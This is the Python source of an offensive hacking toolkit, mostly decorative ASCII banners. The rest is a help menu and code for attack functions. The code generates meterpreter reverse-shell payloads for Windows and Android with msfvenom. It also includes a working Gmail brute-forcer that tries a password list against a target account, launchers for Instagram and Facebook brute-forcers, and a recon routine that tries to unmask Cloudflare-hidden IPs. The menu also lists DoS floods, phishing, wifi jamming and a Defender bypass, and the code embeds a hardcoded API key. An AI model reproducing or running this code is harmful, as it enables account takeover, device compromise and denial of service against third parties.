░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,19) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + 